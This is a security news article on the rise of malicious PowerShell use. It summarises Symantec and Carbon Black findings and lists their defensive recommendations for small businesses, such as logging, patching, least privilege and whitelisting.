How to Guard Against Threats from Microsoft PowerShell Exploits
There are common cybersecurity best practices that most small business owners and IT managers know (or should know): Don’t click on links you don’t recognize. Back up your data regularly and in multiple forms. Use regularly updated anti-virus software. Train your employees.
What about, guard against PowerShell exploits? That’s a little off the beaten path, but security researchers say it’s an increasing problem.
PowerShell is a Microsoft utility that serves as a task automation and configuration management framework. It includes a command-line shell and associated scripting language built on the .NET Framework. The tool lets administrators perform administrative tasks on both local and remote Windows systems as well as WS-Management and the Common Information Model, allowing them to manage remote Linux systems and network devices. It has been around for more than 10 years and will replace the default command prompt on Windows in the future, security firm Symantec notes.
Symantec, Carbon Black Warn of PowerShell Vulnerabilities
According to a report last month from researchers at Symantec, “malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance.”
Symantec analyzed 111 threat families that use PowerShell, and the firm looked at the malware samples to find out how much of a danger they posed. Of the PowerShell scripts analyzed through the Blue Coat Malware Analysis sandbox, 95.4 percent were malicious, according to Symantec.
“This shows that externally sourced PowerShell scripts are a major threat to enterprises,” Candid Wüest, a threat researcher at Symantec, wrote in a blog post.
“While many system administrators use PowerShell scripts for daily management tasks, we have seen attackers increasingly using the framework for their campaigns,” Wüest says. “For example, the Odinaff group used malicious PowerShell scripts when it attacked financial organizations worldwide. Common cybercriminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry.”
Wüest notes that PowerShell is installed by default on most Windows computers, and most organizations “do not have extended logging enabled for the framework.”
“These two factors make PowerShell a favored attack tool. Furthermore, scripts can easily be obfuscated and allow for payloads to be executed directly from memory,” he notes.
Symantec has predominantly seen malicious PowerShell scripts used as downloaders, such as Office macros, and during “the lateral movement phase,” where a threat executes code on a remote computer when spreading inside the network.
The most prevalent malware families that currently use PowerShell are W97M.Downloader (9.4 percent of all analyzed samples), Trojan.Kotver (4.5 percent) and JS.Downloader (4.0 percent), according to Symantec.
Those specific threats have been distributed in spam emails. Over the last six months, Symantec says it blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. “Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage,” Wüest says. “Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections.”
Meanwhile, endpoint security firm Carbon Black released a separate report in December, noting that the company “discovered the first known instance of PowerShell being used in a ransomware attack with PowerWare” which “avoids writing new files to disk and tries to blend in with more legitimate computer activity.”
CarbonBlack also noted that instances of non-malware attacks leveraging PowerShell and Windows Management Instrumentation (WMI) spiked by 93.2 percent in the second quarter of this year and, “after a brief reprieve, have grown to the highest levels we’ve seen in 2016 as we close out the year.”
How to Protect Against PowerShell Attacks
What should organizations, especially small businesses, do to guard against such threats?
As Windows IT Pro notes, “Symantec has skin in this game, of course. It wants you to buy its expertise and solutions.”
And indeed, Wüest notes that Symantec expects more PowerShell threats to appear in the future; the firm strongly recommends that system administrators “upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities.”
Wüest also notes that Symantec and Norton customers are protected against PowerShell threats through the firm’s multilayered security approach. That includes its Anti-virus and Intrusion Prevention System (IPS); behavior-based detection that blocks suspicious processes using the Symantec Online Network for Advanced Response (SONAR) series of detections; email-filtering services such as Symantec Email Security; the Blue Coat Malware Analysis sandbox, which uses a powerful dual-detection approach that combines virtualization and emulation to detect malicious behavior; and other tools.
To guard against ransomware threats via PowerShell, Carbon Black recommends organizations take a slew of steps. These include backing up data regularly and verifying the integrity of those backups; securing offline backups; configuring firewalls to block access to known malicious IP addresses; logically separate networks; patch operating systems, software, and firmware on devices; and consider using a centralized patch-management system.
Carbon Black also recommends implementing an awareness and training program; scanning all incoming and outgoing emails to detect threats and filtering executable files from reaching end users; enabling strong spam filters to prevent phishing emails from reaching end users; and authenticating inbound email using technologies such as Sender Policy Framework (SPF), Domain-based Message Authentication Reporting and Conformance (DMARC), and DomainKeys Identified Mail (DKIM) to prevent spoofing.
Additionally, Carbon Black says firms should take the following steps:
- Use ad-blocking technology
- Use the principle of “least privilege” to manage accounts so that no users are assigned administrative access unless it is absolutely needed
- Leverage next-generation anti-virus technology to inspect files and to identify malicious behavior in order to block malware and malware-less attacks that exploit memory and scripting languages like PowerShell
- Use application whitelisting, which only allows systems to execute programs known and permitted by security policy
- Categorize data based on organizational value and implement physical and logical separation of networks and data for different organizational purposes
- Conduct an annual penetration test and vulnerability assessment